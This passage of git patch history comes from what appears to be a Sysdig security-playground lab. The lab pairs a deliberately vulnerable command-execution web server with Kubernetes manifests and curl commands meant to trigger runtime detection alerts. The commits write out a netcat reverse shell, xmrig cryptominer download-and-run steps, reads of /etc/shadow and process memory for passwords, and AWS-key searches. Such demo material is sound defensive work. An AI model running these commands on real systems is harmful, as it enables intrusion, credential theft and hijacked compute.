Dockerfile.user . - -push: - docker push fernii/security-playground:2.0-root - docker push fernii/security-playground:2.0-user diff --git a/k8s-deployment-user-readonly.yaml b/k8s-deployment-user-readonly.yaml index caa8a27..081e40c 100644 --- a/k8s-deployment-user-readonly.yaml +++ b/k8s-deployment-user-readonly.yaml @@ -36,7 +36,7 @@ spec: sizeLimit: 50Mi containers: - name: security-playground-readonlyfs - image: fernii/security-playground:2.0-user + image: ghcr.io/andrewd-sysdig/security-playground:user-latest volumeMounts: - mountPath: /usr/tmp name: temp-volume diff --git a/k8s-deployment-user.yaml b/k8s-deployment-user.yaml index d95716a..2ec4361 100644 --- a/k8s-deployment-user.yaml +++ b/k8s-deployment-user.yaml @@ -32,7 +32,7 @@ spec: - amd64 containers: - name: security-playground-user - image: fernii/security-playground:2.0-user + image: ghcr.io/andrewd-sysdig/security-playground:user-latest ports: - containerPort: 8080 diff --git a/k8s-deployment.yaml b/k8s-deployment.yaml index 56eec93..146f0d2 100644 --- a/k8s-deployment.yaml +++ b/k8s-deployment.yaml @@ -32,7 +32,7 @@ spec: - amd64 containers: - name: security-playground - image: fernii/security-playground:2.0-root + image: ghcr.io/andrewd-sysdig/security-playground:latest env: - name: PGHOST value: "appdb" diff --git a/k8s-lab1.yml b/k8s-lab1.yml deleted file mode 100644 index 51f47ca..0000000 --- a/k8s-lab1.yml +++ /dev/null @@ -1,102 +0,0 @@ -apiVersion: apps/v1 -kind: Deployment -metadata: - name: security-playground - labels: - app: security-playground -spec: - replicas: 1 - selector: - matchLabels: - app: security-playground - template: - metadata: - labels: - app: security-playground - spec: - affinity: - nodeAffinity: - requiredDuringSchedulingIgnoredDuringExecution: - nodeSelectorTerms: - - matchExpressions: - - key: kubernetes.io/arch - operator: In - values: - - amd64 - containers: - - name: security-playground - image: fernii/security-playground:2.0-root - env: - - name: PGHOST - value: "appdb" - - name: PGUSER - value: "postgres" - - name: PGPASSWORD - value: "postgres" - ports: - - containerPort: 8080 - ---- -apiVersion: v1 -kind: Service -metadata: - labels: - app: security-playground - name: secplay -spec: - ports: - - port: 80 - protocol: TCP - targetPort: 8080 - nodePort: 30000 - selector: - app: security-playground - type: NodePort - ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: appdb - labels: - app: appdb -spec: - replicas: 1 - selector: - matchLabels: - app: appdb - template: - metadata: - labels: - app: appdb - spec: - affinity: - nodeAffinity: - requiredDuringSchedulingIgnoredDuringExecution: - nodeSelectorTerms: - - matchExpressions: - - key: kubernetes.io/arch - operator: In - values: - - amd64 - containers: - - name: appdb - image: aa8y/postgres-dataset:latest - ports: - - containerPort: 5432 - ---- -apiVersion: v1 -kind: Service -metadata: - labels: - app: appdb - name: appdb -spec: - ports: - - port: 5432 - protocol: TCP - targetPort: 5432 - selector: - app: appdb - type: ClusterIP diff --git a/sec-playground-menu.sh b/sec-playground-menu.sh index 5ddac2a..7417cd8 100755 --- a/sec-playground-menu.sh +++ b/sec-playground-menu.sh @@ -1,7 +1,7 @@ #!/bin/bash -read -p "What is the http address of your target? [http://192.168.1.59]: " sec_playground_url -sec_playground_url=${sec_playground_url:-http://192.168.1.59} +read -p "What is the http address of your target? [http://192.168.1.15]: " sec_playground_url +sec_playground_url=${sec_playground_url:-http://192.168.1.15} printy() { printf "\e[33;1m%s\n" "$1" From f19358b3f6e1a5061d1ff81be456d444a5e36ec9 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Wed, 11 Jan 2023 21:41:51 +1100 Subject: [PATCH 08/21] Added a reverse shell open to menu --- README.md | 8 ++++---- k8s-deployment.yaml | 2 ++ sec-playground-menu.sh | 20 +++++++++++++++++++- 3 files changed, 25 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 2ef0fa6..19558af 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,6 @@ # Security Playground -The security playground is a HTTP web server to simulate security breaches in -run time. +The security playground is a HTTP web server to simulate security breaches in run time. ## Installation @@ -14,7 +13,7 @@ $ kubectl apply -f k8s-deployment.yaml Or run it locally in a using docker ```bash -$ docker run --rm -p 8080:8080 sysdiglabs/security-playground +$ docker run --rm -p 8080:8080 ghcr.io/andrewd-sysdig/security-playground:latest ``` ## Usage @@ -57,7 +56,7 @@ Or for some quick testing try the sec-playground-menu.sh bash script ```bash $ ./sec-playground-menu.sh -What is the http address of your target? [http://192.168.1.59]: +What is the http address of your target? [http://192.168.1.15]: Select an Exploit: 1) Read Sensitive File @@ -68,6 +67,7 @@ Select an Exploit: 6) Install PSQL Tools 7) Dump DB 8) Exfiltrate Data +9) Open Reverse Shell 0) Exit Choose an option: ``` diff --git a/k8s-deployment.yaml b/k8s-deployment.yaml index 146f0d2..a39d402 100644 --- a/k8s-deployment.yaml +++ b/k8s-deployment.yaml @@ -42,6 +42,8 @@ spec: value: "postgres" ports: - containerPort: 8080 + securityContext: + privileged: true --- apiVersion: v1 diff --git a/sec-playground-menu.sh b/sec-playground-menu.sh index 7417cd8..48d63f6 100755 --- a/sec-playground-menu.sh +++ b/sec-playground-menu.sh @@ -138,18 +138,35 @@ function exfiltrate_data() { printg "********************************************************************************" } +function open_reverse_shell() { + printg "********************************************************************************" + echo "" + echo "Opening Reverse shell on target... " + echo "!!!!!!!! Make sure you have netcat listening for the reverse shell on 192.168.0.10 port 4242: nc -l 4242" + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d command='content=rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.10 4242 >/tmp/f'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d command='content=rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>%261|nc 192.168.0.10 4242 >/tmp/f' + echo "" + printg "********************************************************************************" +} + menu(){ echo -ne " Select an Exploit: 1) Read Sensitive File 2) Write script to /tmp -3) Exec bad script +3) Run Script - Install nmap, bash 4) Run Port Scan 5) Dump Environment Variables 6) Install PSQL Tools 7) Dump DB 8) Exfiltrate Data +9) Open Reverse Shell 0) Exit Choose an option: " read a @@ -162,6 +179,7 @@ Choose an option: " 6) install_psql_tools ; menu ;; 7) dump_db ; menu ;; 8) exfiltrate_data ; menu ;; + 9) open_reverse_shell ; menu ;; 0) exit 0 ;; esac } From 0241a98ded5fa51254671270950cae35883072cc Mon Sep 17 00:00:00 2001 From: Andrew D Date: Tue, 31 Jan 2023 16:15:51 -0800 Subject: [PATCH 09/21] Refactor structure --- .github/workflows/docker-image.yml | 4 +- .gitignore | 1 - k8s-deployment-user-readonly.yaml | 69 ------------------- .../crypto-miner-nonroot/README.md | 7 ++ .../crypto-miner-nonroot/deployment.yaml | 22 +++--- .../crypto-miner-readonly/README.md | 7 ++ .../crypto-miner-readonly/deployment.yaml | 53 ++++++++++++++ kubernetes-manifests/crypto-miner/README.md | 7 ++ .../crypto-miner/deployment.yaml | 53 ++++++++++++++ .../data-exfiltration/README.md | 27 ++++++++ .../data-exfiltration/deployment.yaml | 0 .../data-exfiltration/sec-playground-menu.sh | 0 Dockerfile => src/Dockerfile | 0 Dockerfile.user => src/Dockerfile.user | 0 app.py => src/app.py | 0 requirements.txt => src/requirements.txt | 0 16 files changed, 167 insertions(+), 83 deletions(-) delete mode 100644 .gitignore delete mode 100644 k8s-deployment-user-readonly.yaml create mode 100644 kubernetes-manifests/crypto-miner-nonroot/README.md rename k8s-deployment-user.yaml => kubernetes-manifests/crypto-miner-nonroot/deployment.yaml (67%) create mode 100644 kubernetes-manifests/crypto-miner-readonly/README.md create mode 100644 kubernetes-manifests/crypto-miner-readonly/deployment.yaml create mode 100644 kubernetes-manifests/crypto-miner/README.md create mode 100644 kubernetes-manifests/crypto-miner/deployment.yaml create mode 100644 kubernetes-manifests/data-exfiltration/README.md rename k8s-deployment.yaml => kubernetes-manifests/data-exfiltration/deployment.yaml (100%) rename sec-playground-menu.sh => kubernetes-manifests/data-exfiltration/sec-playground-menu.sh (100%) rename Dockerfile => src/Dockerfile (100%) rename Dockerfile.user => src/Dockerfile.user (100%) rename app.py => src/app.py (100%) rename requirements.txt => src/requirements.txt (100%) diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml index 1c68b91..f095dbc 100644 --- a/.github/workflows/docker-image.yml +++ b/.github/workflows/docker-image.yml @@ -20,8 +20,8 @@ jobs: - name: Build the Docker image run: | - docker build . --file Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest - docker build . --file Dockerfile.user --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-latest + docker build ./src --file src/Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest + docker build ./src --file src/Dockerfile.user --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-latest - name: Sysdig Secure Inline Scan - New run: | diff --git a/.gitignore b/.gitignore deleted file mode 100644 index 3fb5ab6..0000000 --- a/.gitignore +++ /dev/null @@ -1 +0,0 @@ -scan-logs diff --git a/k8s-deployment-user-readonly.yaml b/k8s-deployment-user-readonly.yaml deleted file mode 100644 index 081e40c..0000000 --- a/k8s-deployment-user-readonly.yaml +++ /dev/null @@ -1,69 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: secplay - ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: security-playground-user-readonlyfs - namespace: secplay - labels: - app: security-playground-readonlyfs -spec: - replicas: 1 - selector: - matchLabels: - app: security-playground-readonlyfs - template: - metadata: - labels: - app: security-playground-readonlyfs - spec: - affinity: - nodeAffinity: - requiredDuringSchedulingIgnoredDuringExecution: - nodeSelectorTerms: - - matchExpressions: - - key: kubernetes.io/arch - operator: In - values: - - amd64 - volumes: - - name: temp-volume - emptyDir: - sizeLimit: 50Mi - containers: - - name: security-playground-readonlyfs - image: ghcr.io/andrewd-sysdig/security-playground:user-latest - volumeMounts: - - mountPath: /usr/tmp - name: temp-volume - ports: - - containerPort: 8080 - securityContext: - runAsNonRoot: true - runAsUser: 65534 - capabilities: - drop: - - all - readOnlyRootFilesystem: true - ---- -apiVersion: v1 -kind: Service -metadata: - labels: - app: security-playground-readonlyfs - name: security-playground-readonlyfs-svc -spec: - ports: - - port: 80 - protocol: TCP - targetPort: 8080 - selector: - app: security-playground-readonlyfs - type: LoadBalancer - - diff --git a/kubernetes-manifests/crypto-miner-nonroot/README.md b/kubernetes-manifests/crypto-miner-nonroot/README.md new file mode 100644 index 0000000..92c5eee --- /dev/null +++ b/kubernetes-manifests/crypto-miner-nonroot/README.md @@ -0,0 +1,7 @@ +# Steal Compute / Run Cryptominer Data flow + +| Attack Step | Curl Command | Expected Sysdig Event | +|---|---|--| +| Download xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz -O /tmp/xmrig.tar.gz'` | xxx | +| Extract xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=tar -xzvf /tmp/xmrig.tar.gz -C /tmp/'` | xxx | +| Run xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=/tmp/xmrig-6.18.1/xmrig'` | xxx | \ No newline at end of file diff --git a/k8s-deployment-user.yaml b/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml similarity index 67% rename from k8s-deployment-user.yaml rename to kubernetes-manifests/crypto-miner-nonroot/deployment.yaml index 2ec4361..7f8e6ae 100644 --- a/k8s-deployment-user.yaml +++ b/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml @@ -2,24 +2,23 @@ apiVersion: v1 kind: Namespace metadata: name: secplay - --- apiVersion: apps/v1 kind: Deployment metadata: - name: security-playground-user + name: security-playground namespace: secplay labels: - app: security-playground-user + app: security-playground spec: replicas: 1 selector: matchLabels: - app: security-playground-user + app: security-playground template: metadata: labels: - app: security-playground-user + app: security-playground spec: affinity: nodeAffinity: @@ -31,23 +30,24 @@ spec: values: - amd64 containers: - - name: security-playground-user - image: ghcr.io/andrewd-sysdig/security-playground:user-latest + - name: security-playground + image: ghcr.io/andrewd-sysdig/security-playground:latest ports: - containerPort: 8080 - + securityContext: + privileged: true --- apiVersion: v1 kind: Service metadata: labels: - app: security-playground-user - name: security-playground-user-svc + app: security-playground + name: secplay spec: ports: - port: 80 protocol: TCP targetPort: 8080 selector: - app: security-playground-user + app: security-playground type: LoadBalancer \ No newline at end of file diff --git a/kubernetes-manifests/crypto-miner-readonly/README.md b/kubernetes-manifests/crypto-miner-readonly/README.md new file mode 100644 index 0000000..1d22a16 --- /dev/null +++ b/kubernetes-manifests/crypto-miner-readonly/README.md @@ -0,0 +1,7 @@ +# Steal Compute / Run Cryptominer Data flow + +| Attack Step | Curl Command | Expected Sysdig Event | +|---|---|--| +| Download xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'` | xxx | +| Extract xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=tar -xzvf xmrig.tar.gz'` | xxx | +| Run xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=/app/xmrig-6.18.1/xmrig'` | xxx | \ No newline at end of file diff --git a/kubernetes-manifests/crypto-miner-readonly/deployment.yaml b/kubernetes-manifests/crypto-miner-readonly/deployment.yaml new file mode 100644 index 0000000..7f8e6ae --- /dev/null +++ b/kubernetes-manifests/crypto-miner-readonly/deployment.yaml @@ -0,0 +1,53 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground + namespace: secplay + labels: + app: security-playground +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground + template: + metadata: + labels: + app: security-playground + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground + image: ghcr.io/andrewd-sysdig/security-playground:latest + ports: + - containerPort: 8080 + securityContext: + privileged: true +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground + name: secplay +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground + type: LoadBalancer \ No newline at end of file diff --git a/kubernetes-manifests/crypto-miner/README.md b/kubernetes-manifests/crypto-miner/README.md new file mode 100644 index 0000000..1d22a16 --- /dev/null +++ b/kubernetes-manifests/crypto-miner/README.md @@ -0,0 +1,7 @@ +# Steal Compute / Run Cryptominer Data flow + +| Attack Step | Curl Command | Expected Sysdig Event | +|---|---|--| +| Download xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'` | xxx | +| Extract xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=tar -xzvf xmrig.tar.gz'` | xxx | +| Run xmrig | `curl -X POST http://192.168.1.15/exec -d 'command=/app/xmrig-6.18.1/xmrig'` | xxx | \ No newline at end of file diff --git a/kubernetes-manifests/crypto-miner/deployment.yaml b/kubernetes-manifests/crypto-miner/deployment.yaml new file mode 100644 index 0000000..7f8e6ae --- /dev/null +++ b/kubernetes-manifests/crypto-miner/deployment.yaml @@ -0,0 +1,53 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground + namespace: secplay + labels: + app: security-playground +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground + template: + metadata: + labels: + app: security-playground + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground + image: ghcr.io/andrewd-sysdig/security-playground:latest + ports: + - containerPort: 8080 + securityContext: + privileged: true +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground + name: secplay +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground + type: LoadBalancer \ No newline at end of file diff --git a/kubernetes-manifests/data-exfiltration/README.md b/kubernetes-manifests/data-exfiltration/README.md new file mode 100644 index 0000000..98b915d --- /dev/null +++ b/kubernetes-manifests/data-exfiltration/README.md @@ -0,0 +1,27 @@ +# Steal Data / Exfiltrate Data flow + +| Attack Step | Curl Command | Expected Sysdig Event | +|---|---|--| +| Install nmap, openssh | `curl -X POST http://192.168.1.15/exec -d 'command=apk add nmap openssh'` | Launch Package Management Process in Container | +| x | x | x | + + +Or for some quick testing try the sec-playground-menu.sh bash script + +```bash +$ ./sec-playground-menu.sh +What is the http address of your target? [http://192.168.1.15]: + +Select an Exploit: +1) Read Sensitive File +2) Write script to /tmp +3) Exec bad script +4) Run Port Scan +5) Dump Environment Variables +6) Install PSQL Tools +7) Dump DB +8) Exfiltrate Data +9) Open Reverse Shell +0) Exit +Choose an option: +``` \ No newline at end of file diff --git a/k8s-deployment.yaml b/kubernetes-manifests/data-exfiltration/deployment.yaml similarity index 100% rename from k8s-deployment.yaml rename to kubernetes-manifests/data-exfiltration/deployment.yaml diff --git a/sec-playground-menu.sh b/kubernetes-manifests/data-exfiltration/sec-playground-menu.sh similarity index 100% rename from sec-playground-menu.sh rename to kubernetes-manifests/data-exfiltration/sec-playground-menu.sh diff --git a/Dockerfile b/src/Dockerfile similarity index 100% rename from Dockerfile rename to src/Dockerfile diff --git a/Dockerfile.user b/src/Dockerfile.user similarity index 100% rename from Dockerfile.user rename to src/Dockerfile.user diff --git a/app.py b/src/app.py similarity index 100% rename from app.py rename to src/app.py diff --git a/requirements.txt b/src/requirements.txt similarity index 100% rename from requirements.txt rename to src/requirements.txt From a331d4d24b2e1ea03da93bc87d78d5a703c171d3 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Tue, 31 Jan 2023 16:19:46 -0800 Subject: [PATCH 10/21] Remove setuptools --- src/Dockerfile | 1 + 1 file changed, 1 insertion(+) diff --git a/src/Dockerfile b/src/Dockerfile index a0e77b9..e0fe9c8 100644 --- a/src/Dockerfile +++ b/src/Dockerfile @@ -5,6 +5,7 @@ WORKDIR /app COPY requirements.txt app.py /app/ RUN pip3 install -r requirements.txt +RUN pip3 uninstall setuptools -y EXPOSE 8080 From 3f12ca5c61ac06d056b3704c0c6324ddc842fee7 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Tue, 31 Jan 2023 22:03:25 -0800 Subject: [PATCH 11/21] Added generic deployment and simple curl examples --- README.md | 65 +++++++++++++--------------- kubernetes-manifests/deployment.yaml | 53 +++++++++++++++++++++++ 2 files changed, 83 insertions(+), 35 deletions(-) create mode 100644 kubernetes-manifests/deployment.yaml diff --git a/README.md b/README.md index 19558af..463d120 100644 --- a/README.md +++ b/README.md @@ -1,19 +1,21 @@ # Security Playground -The security playground is a HTTP web server to simulate security breaches in run time. +The security playground is a HTTP web server that alllows you to simulate various security breaches in runtime. ## Installation -Use the docker image to deploy it in your Kubernetes cluster +Use the deployment.yaml to deploy this to your kubernetes cluster, it will deploy +- Deployment with 1 Replica of the pod +- LoadBalancer Service to expose the web server on port 80/HTTP ```bash -$ kubectl apply -f k8s-deployment.yaml +kubectl apply -f kubernetes-manifests/deployment.yaml ``` -Or run it locally in a using docker +Or run it locally in using docker ```bash -$ docker run --rm -p 8080:8080 ghcr.io/andrewd-sysdig/security-playground:latest +docker run --rm -p 8080:8080 ghcr.io/andrewd-sysdig/security-playground:latest ``` ## Usage @@ -22,52 +24,45 @@ The HTTP API exposes three endpoints to interact with the system. ### Reading a file -You can read a file using just the URL. +You can read a file using just the URL. This will return the content of the /etc/shadow file. ```bash -$ curl localhost:8080/etc/shadow +curl http:///etc/shadow ``` -This will return the content of the /etc/shadow file. - ### Writing a file -You can write to a file using the URL and POSTing the content. +You can write to a file using the URL and POSTing the content. This will write to /bin/hello the hello-world string. ```bash -$ curl -X POST localhost:8080/bin/hello -d 'content=hello-world' +curl -X POST http:///bin/hello -d 'content=hello-world' ``` -This will write to /bin/hello the hello-world string - ### Executing a command -You can execute a command using the /exec endpoint and POSTing the command. +You can execute a command using the /exec endpoint and POSTing the command. This will capture and return the STDOUT of the command executed. ```bash -$ curl -X POST /exec -d 'command=ls -la' +curl -X POST http:///exec -d 'command=ls -la' ``` -This will capture and return the STDOUT of the command executed. +## Library of curl commands to trigger various Sysdig Events -### Interactive Menu +Set the WEBSERVERIP env variable to be the IP of your target (the pod/service) -Or for some quick testing try the sec-playground-menu.sh bash script +`export WEBSERVERIP=192.168.1.15` -```bash -$ ./sec-playground-menu.sh -What is the http address of your target? [http://192.168.1.15]: - -Select an Exploit: -1) Read Sensitive File -2) Write script to /tmp -3) Exec bad script -4) Run Port Scan -5) Dump Environment Variables -6) Install PSQL Tools -7) Dump DB -8) Exfiltrate Data -9) Open Reverse Shell -0) Exit -Choose an option: -``` +> **Sysdig Managed Policy: Sysdig Runtime Threat Detection (Severity: High)** + +| Sysdig Event | Curl Command | +|---|---| +| Reconnaissance attempt to find SUID binaries | `curl -X POST http://$WEBSERVERIP/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'` | +| Dump memory for credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep passwd /proc/1/mem'` | +| Find AWS Credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/'` | +| Netcat Remote Code Execution in Contianer | `curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242'` | + +> **Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium)** + +| Sysdig Event | Curl Command | +|---|---| +| Read sensitive file untrusted | `curl http://security-playground-aks-ds-dskb-nonprod-aue.azr.cmltd.net.au/etc/shadow` | diff --git a/kubernetes-manifests/deployment.yaml b/kubernetes-manifests/deployment.yaml new file mode 100644 index 0000000..7f8e6ae --- /dev/null +++ b/kubernetes-manifests/deployment.yaml @@ -0,0 +1,53 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground + namespace: secplay + labels: + app: security-playground +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground + template: + metadata: + labels: + app: security-playground + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground + image: ghcr.io/andrewd-sysdig/security-playground:latest + ports: + - containerPort: 8080 + securityContext: + privileged: true +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground + name: secplay +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground + type: LoadBalancer \ No newline at end of file From 7dbf526bb51ca5adcb5fba0ccc875d888c592882 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Tue, 31 Jan 2023 22:09:31 -0800 Subject: [PATCH 12/21] Fixed formatting --- README.md | 42 ++++++++++++++++++++++++++++++------------ 1 file changed, 30 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index 463d120..7b81867 100644 --- a/README.md +++ b/README.md @@ -50,19 +50,37 @@ curl -X POST http:///exec -d 'command=ls -la' Set the WEBSERVERIP env variable to be the IP of your target (the pod/service) -`export WEBSERVERIP=192.168.1.15` +```bash +export WEBSERVERIP=192.168.1.15 +``` -> **Sysdig Managed Policy: Sysdig Runtime Threat Detection (Severity: High)** +### Sysdig Managed Policy: Sysdig Runtime Threat Detection (Severity: High) -| Sysdig Event | Curl Command | -|---|---| -| Reconnaissance attempt to find SUID binaries | `curl -X POST http://$WEBSERVERIP/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'` | -| Dump memory for credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep passwd /proc/1/mem'` | -| Find AWS Credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/'` | -| Netcat Remote Code Execution in Contianer | `curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242'` | +**Sysdig Event:** Reconnaissance attempt to find SUID binaries +**Command:** +``` +curl -X POST http://$WEBSERVERIP/exec -d 'command=find / -perm -u=s -type f 2>/dev/null' +``` +**Sysdig Event:** Dump memory for credentials +**Command:** +``` +curl -X POST http://$WEBSERVERIP/exec -d 'command=grep passwd /proc/1/mem' +``` +**Sysdig Event:** Find AWS Credentials +**Command:** +``` +curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/' +``` +**Sysdig Event:** Netcat Remote Code Execution in Contianer +**Command:** +``` +curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242' +``` -> **Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium)** +### Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium) -| Sysdig Event | Curl Command | -|---|---| -| Read sensitive file untrusted | `curl http://security-playground-aks-ds-dskb-nonprod-aue.azr.cmltd.net.au/etc/shadow` | +**Sysdig Event:** Read sensitive file untrusted +**Command:** +``` +curl http://$WEBSERVERIP/etc/shadow +``` \ No newline at end of file From 7b46bfa04c2c1e920af042c5e9a91df3f9cbf96a Mon Sep 17 00:00:00 2001 From: Andrew D Date: Wed, 1 Feb 2023 12:42:33 -0800 Subject: [PATCH 13/21] Fix crypto deployments for labs --- .../crypto-miner-nonroot/deployment.yaml | 27 +++++++------- .../crypto-miner-readonly/deployment.yaml | 35 ++++++++++++------- .../crypto-miner/deployment.yaml | 21 +++++------ 3 files changed, 45 insertions(+), 38 deletions(-) diff --git a/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml b/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml index 7f8e6ae..aa6caff 100644 --- a/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml +++ b/kubernetes-manifests/crypto-miner-nonroot/deployment.yaml @@ -1,13 +1,7 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: secplay ---- apiVersion: apps/v1 kind: Deployment metadata: name: security-playground - namespace: secplay labels: app: security-playground spec: @@ -20,6 +14,10 @@ spec: labels: app: security-playground spec: + securityContext: + runAsUser: 1000 + runAsGroup: 1000 + fsGroup: 1000 affinity: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: @@ -30,24 +28,27 @@ spec: values: - amd64 containers: - - name: security-playground + - name: security-playground-user image: ghcr.io/andrewd-sysdig/security-playground:latest + imagePullPolicy: Always ports: - containerPort: 8080 securityContext: - privileged: true + allowPrivilegeEscalation: false + --- apiVersion: v1 kind: Service metadata: labels: app: security-playground - name: secplay + name: security-playground spec: ports: - - port: 80 - protocol: TCP - targetPort: 8080 + - port: 80 + protocol: TCP + targetPort: 8080 + nodePort: 30000 selector: app: security-playground - type: LoadBalancer \ No newline at end of file + type: NodePort diff --git a/kubernetes-manifests/crypto-miner-readonly/deployment.yaml b/kubernetes-manifests/crypto-miner-readonly/deployment.yaml index 7f8e6ae..37b45df 100644 --- a/kubernetes-manifests/crypto-miner-readonly/deployment.yaml +++ b/kubernetes-manifests/crypto-miner-readonly/deployment.yaml @@ -1,13 +1,7 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: secplay ---- apiVersion: apps/v1 kind: Deployment metadata: name: security-playground - namespace: secplay labels: app: security-playground spec: @@ -29,25 +23,42 @@ spec: operator: In values: - amd64 + securityContext: + runAsNonRoot: true + runAsUser: 1000 + runAsGroup: 1000 + fsGroup: 1000 containers: - name: security-playground image: ghcr.io/andrewd-sysdig/security-playground:latest + imagePullPolicy: Always ports: - containerPort: 8080 securityContext: - privileged: true + allowPrivilegeEscalation: false + privileged: false + readOnlyRootFilesystem: true + volumeMounts: + - mountPath: /tmp + name: tmp-volume + volumes: + - hostPath: + path: /tmp2 + name: tmp-volume + --- apiVersion: v1 kind: Service metadata: labels: app: security-playground - name: secplay + name: security-playground spec: ports: - - port: 80 - protocol: TCP - targetPort: 8080 + - port: 80 + protocol: TCP + targetPort: 8080 + nodePort: 30000 selector: app: security-playground - type: LoadBalancer \ No newline at end of file + type: NodePort \ No newline at end of file diff --git a/kubernetes-manifests/crypto-miner/deployment.yaml b/kubernetes-manifests/crypto-miner/deployment.yaml index 7f8e6ae..30d8cc7 100644 --- a/kubernetes-manifests/crypto-miner/deployment.yaml +++ b/kubernetes-manifests/crypto-miner/deployment.yaml @@ -1,13 +1,7 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: secplay ---- apiVersion: apps/v1 kind: Deployment metadata: name: security-playground - namespace: secplay labels: app: security-playground spec: @@ -32,22 +26,23 @@ spec: containers: - name: security-playground image: ghcr.io/andrewd-sysdig/security-playground:latest + imagePullPolicy: Always ports: - containerPort: 8080 - securityContext: - privileged: true + --- apiVersion: v1 kind: Service metadata: labels: app: security-playground - name: secplay + name: security-playground spec: ports: - - port: 80 - protocol: TCP - targetPort: 8080 + - port: 80 + protocol: TCP + targetPort: 8080 + nodePort: 30000 selector: app: security-playground - type: LoadBalancer \ No newline at end of file + type: NodePort From 75ec6bc4b11ab5123ddd7204cf351e649d5da04e Mon Sep 17 00:00:00 2001 From: Andrew D Date: Wed, 1 Feb 2023 14:44:32 -0800 Subject: [PATCH 